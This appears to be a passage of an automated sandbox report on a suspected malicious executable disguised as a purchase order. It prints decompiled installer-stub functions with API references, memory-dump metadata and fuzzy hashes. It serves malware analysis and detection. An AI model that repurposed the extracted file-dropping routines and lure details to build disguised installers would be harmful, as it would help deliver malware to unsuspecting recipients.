                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                          • String ID: /B$ /B$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 900638850-1912783298
                                                                                                                          • Opcode ID: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                                                                                                          • Instruction ID: bc679195f81621fcb390d0e71ed0d7b45f11abfd0e51c03931a277fa57cc5d3e
                                                                                                                          • Opcode Fuzzy Hash: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                                                                                                          • Instruction Fuzzy Hash: A051F471A04A02ABEB256F24DC847BB3B74DB55315F50823BE991B62D0D33C4A42DF8E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405F5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405F5D(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040585B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405819("*?|<>/\":", _t5))) == 0) {
							E00405993(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                          0x00405f5f
                                                                                                                          0x00405f67
                                                                                                                          0x00405f7b
                                                                                                                          0x00405f7b
                                                                                                                          0x00405f81
                                                                                                                          0x00405f8e
                                                                                                                          0x00405f8e
                                                                                                                          0x00405f8f
                                                                                                                          0x00405f91
                                                                                                                          0x00405f95
                                                                                                                          0x00405f97
                                                                                                                          0x00405fa0
                                                                                                                          0x00405fa2
                                                                                                                          0x00405fbc
                                                                                                                          0x00405fc4
                                                                                                                          0x00405fc4
                                                                                                                          0x00405fc9
                                                                                                                          0x00405fcb
                                                                                                                          0x00405fcd
                                                                                                                          0x00405fd1
                                                                                                                          0x00405fd2
                                                                                                                          0x00405fd5
                                                                                                                          0x00405fdd
                                                                                                                          0x00405fdf
                                                                                                                          0x00405fe3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fe9
                                                                                                                          0x00405fee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fee
                                                                                                                          0x00405ff3

                                                                                                                          APIs
                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                                                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                                                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                                                                                                          • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F5E, 00405F63
                                                                                                                          • *?|<>/":, xrefs: 00405FA5
                                                                                                                          • "C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe", xrefs: 00405F99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: "C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-3399052502
                                                                                                                          • Opcode ID: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                                                                                                          • Instruction ID: afd4a01125e034af7a3871a1a8bdb924777211b2e54028c3170dd0334d944cbd
                                                                                                                          • Opcode Fuzzy Hash: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                                                                                                          • Instruction Fuzzy Hash: 7111B251808B962DEB3216384C44B777F9DCB967A0F5844BBE9C5722C2C67C9C438B6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040401E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040401E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                                          0x00404030
                                                                                                                          0x004040c4
                                                                                                                          0x00000000
                                                                                                                          0x004040c4
                                                                                                                          0x00404041
                                                                                                                          0x00404045
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040404b
                                                                                                                          0x00404054
                                                                                                                          0x00404057
                                                                                                                          0x00404057
                                                                                                                          0x0040405d
                                                                                                                          0x00404063
                                                                                                                          0x00404063
                                                                                                                          0x0040406f
                                                                                                                          0x00404075
                                                                                                                          0x0040407c
                                                                                                                          0x0040407f
                                                                                                                          0x00404082
                                                                                                                          0x00404084
                                                                                                                          0x00404084
                                                                                                                          0x0040408c
                                                                                                                          0x00404092
                                                                                                                          0x00404092
                                                                                                                          0x0040409c
                                                                                                                          0x004040a1
                                                                                                                          0x004040a4
                                                                                                                          0x004040a9
                                                                                                                          0x004040ac
                                                                                                                          0x004040ac
                                                                                                                          0x004040bc
                                                                                                                          0x004040bc
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                                                                                          • Instruction ID: 6c3acea846b2bea6830d2fc4e13120c874811c96ebe523463579326edd4eeab8
                                                                                                                          • Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                                                                                          • Instruction Fuzzy Hash: AC2184B1904704ABC7319F78DD08B4B7BF8AF41714F048629EA95F22E0C734E904CB65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402692 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00402692(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A0C(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E0040585B(_t52) == 0) {
					E00402A0C(0xffffffed);
				}
				E004059B3(_t52);
				_t27 = E004059D2(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f94;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403207(_t47);
						E004031D5(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402F2E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405993( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402F2E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                                          0x00402692
                                                                                                                          0x00402694
                                                                                                                          0x004026a0
                                                                                                                          0x004026a3
                                                                                                                          0x004026ad
                                                                                                                          0x004026b1
                                                                                                                          0x004026b1
                                                                                                                          0x004026b7
                                                                                                                          0x004026c4
                                                                                                                          0x004026cc
                                                                                                                          0x004026cf
                                                                                                                          0x004026d5
                                                                                                                          0x004026e3
                                                                                                                          0x004026e8
                                                                                                                          0x004026ec
                                                                                                                          0x004026ef
                                                                                                                          0x004026f8
                                                                                                                          0x00402704
                                                                                                                          0x00402708
                                                                                                                          0x0040270b
                                                                                                                          0x00402715
                                                                                                                          0x00402734
                                                                                                                          0x0040271c
                                                                                                                          0x00402721
                                                                                                                          0x00402729
                                                                                                                          0x0040272c
                                                                                                                          0x00402731
                                                                                                                          0x00402731
                                                                                                                          0x0040273b
                                                                                                                          0x0040273b
                                                                                                                          0x0040274d
                                                                                                                          0x00402754
                                                                                                                          0x00402766
                                                                                                                          0x00402766
                                                                                                                          0x0040276c
                                                                                                                          0x0040276c
                                                                                                                          0x00402777
                                                                                                                          0x00402778
                                                                                                                          0x0040277c
                                                                                                                          0x00402780
                                                                                                                          0x00402786
                                                                                                                          0x00402786
                                                                                                                          0x0040278d
                                                                                                                          0x0040217a
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0

                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
                                                                                                                          • GlobalFree.KERNEL32 ref: 0040273B
                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
                                                                                                                          • GlobalFree.KERNEL32 ref: 00402754
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3294113728-0
                                                                                                                          • Opcode ID: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                                                                                                          • Instruction ID: 9ca97f70dd32fe41b4909f681106d09eb720980563b4c140891508526f153775
                                                                                                                          • Opcode Fuzzy Hash: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                                                                                                          • Instruction Fuzzy Hash: 2331AD71C00028BBDF216FA5DE88DAE7E79EF05364F10023AF920762E1C77919409F99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404FE7 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404FE7(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424034;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D1D(0, _t39, 0x41fd58, 0x41fd58, _a4);
					}
					_t26 = lstrlenA(0x41fd58);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423748, 0x41fd58);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd58;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd58)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd58, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                          0x00404fed
                                                                                                                          0x00404ff9
                                                                                                                          0x00404ffc
                                                                                                                          0x00405002
                                                                                                                          0x0040500e
                                                                                                                          0x00405011
                                                                                                                          0x00405014
                                                                                                                          0x0040501a
                                                                                                                          0x0040501a
                                                                                                                          0x00405020
                                                                                                                          0x00405028
                                                                                                                          0x0040502b
                                                                                                                          0x00405048
                                                                                                                          0x0040504c
                                                                                                                          0x00405055
                                                                                                                          0x00405055
                                                                                                                          0x0040505f
                                                                                                                          0x00405068
                                                                                                                          0x00405074
                                                                                                                          0x0040507b
                                                                                                                          0x0040507f
                                                                                                                          0x00405082
                                                                                                                          0x00405095
                                                                                                                          0x004050a3
                                                                                                                          0x004050a3
                                                                                                                          0x004050a7
                                                                                                                          0x004050a9
                                                                                                                          0x004050ac
                                                                                                                          0x00000000
                                                                                                                          0x004050ac
                                                                                                                          0x0040502d
                                                                                                                          0x00405035
                                                                                                                          0x0040503d
                                                                                                                          0x00405043
                                                                                                                          0x00000000
                                                                                                                          0x00405043
                                                                                                                          0x0040503d
                                                                                                                          0x0040502b
                                                                                                                          0x004050b6

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                                                                          • lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                                                                          • lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                                                                          • SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2531174081-0
                                                                                                                          • Opcode ID: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                                                                                                          • Instruction ID: e3991c5cb709e07264e8487875a2ca594626b649f9c95e4975d9101e96294db0
                                                                                                                          • Opcode Fuzzy Hash: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                                                                                                          • Instruction Fuzzy Hash: 0A21AC71900508BBDF11AFA4CC849DFBFB9EF44354F10803AF504B62A0C2398E808FA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402BE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402BE9(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41712c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41712c = 0;
					return _t15;
				}
				__eflags =  *0x41712c; // 0x0
				if(__eflags != 0) {
					return E004060C3(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423f8c;
				if(_t6 >  *0x423f8c) {
					__eflags =  *0x423f88;
					if( *0x423f88 == 0) {
						_t7 = CreateDialogParamA( *0x423f80, 0x6f, 0, E00402B51, 0);
						 *0x41712c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424034 & 0x00000001;
					if(( *0x424034 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BCD());
						return E00404FE7(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                                          0x00402bf5
                                                                                                                          0x00402bf7
                                                                                                                          0x00402bfe
                                                                                                                          0x00402c01
                                                                                                                          0x00402c01
                                                                                                                          0x00402c07
                                                                                                                          0x00000000
                                                                                                                          0x00402c07
                                                                                                                          0x00402c0f
                                                                                                                          0x00402c15
                                                                                                                          0x00000000
                                                                                                                          0x00402c18
                                                                                                                          0x00402c1f
                                                                                                                          0x00402c25
                                                                                                                          0x00402c2b
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c33
                                                                                                                          0x00402c71
                                                                                                                          0x00402c7a
                                                                                                                          0x00000000
                                                                                                                          0x00402c7f
                                                                                                                          0x00402c35
                                                                                                                          0x00402c3c
                                                                                                                          0x00402c4d
                                                                                                                          0x00000000
                                                                                                                          0x00402c5b
                                                                                                                          0x00402c3c
                                                                                                                          0x00402c87

                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402C01
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C1F
                                                                                                                          • wsprintfA.USER32 ref: 00402C4D
                                                                                                                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                                                                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                                                                            • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                                                                            • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C71
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C7F
                                                                                                                            • Part of subcall function 00402BCD: MulDiv.KERNEL32(0001D99F,00000064,?), ref: 00402BE2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                          • Opcode ID: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                                                                                                          • Instruction ID: c64e3f0d3b0757b6abccf377c05ef7dd5a4a2d15633f5d7fd60a106f882d1610
                                                                                                                          • Opcode Fuzzy Hash: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                                                                                                          • Instruction Fuzzy Hash: F701CC30909215A7E7216FA0AF4DE9E7778A709701750803BFA01B11D0D2F855458BAE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004048B6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004048B6(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                          0x004048c4
                                                                                                                          0x004048d1
                                                                                                                          0x004048d7
                                                                                                                          0x00404915
                                                                                                                          0x00404915
                                                                                                                          0x00404924
                                                                                                                          0x0040492b
                                                                                                                          0x00000000
                                                                                                                          0x0040492d
                                                                                                                          0x004048d9
                                                                                                                          0x004048e8
                                                                                                                          0x004048f0
                                                                                                                          0x004048f3
                                                                                                                          0x00404905
                                                                                                                          0x0040490b
                                                                                                                          0x00404912
                                                                                                                          0x00000000
